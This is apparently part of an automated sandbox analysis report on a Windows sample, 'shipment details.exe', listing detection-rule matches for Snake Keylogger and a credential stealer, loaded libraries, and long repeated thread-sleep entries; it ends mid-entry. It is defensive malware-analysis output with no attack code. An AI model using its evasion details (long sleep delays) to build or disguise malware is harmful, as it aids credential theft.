Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cb5630.3.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cf9060.2.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.shipment details.exe.3cb5630.3.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.shipment details.exe.3b4ad70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 00000000.00000002.4523008463.0000000005420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector |
Source: 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: shipment details.exe PID: 4788, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: textshaping.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599890 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599781 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599672 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599562 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599453 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599343 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599224 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599109 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598968 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598856 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598732 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598625 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598515 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598406 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598297 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598187 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598078 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597968 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597859 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597745 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597640 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597531 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597415 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597312 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597203 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597093 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596984 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596875 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596765 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596656 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596546 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596437 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596326 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596218 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596109 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596000 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595890 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595672 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595562 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595453 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595343 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595234 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595125 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595015 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594906 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594797 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594687 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594578 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep count: 32 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -29514790517935264s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -600000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599890s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672 |
Thread sleep count: 2008 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672 |
Thread sleep count: 7806 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599781s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599672s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599562s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599453s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
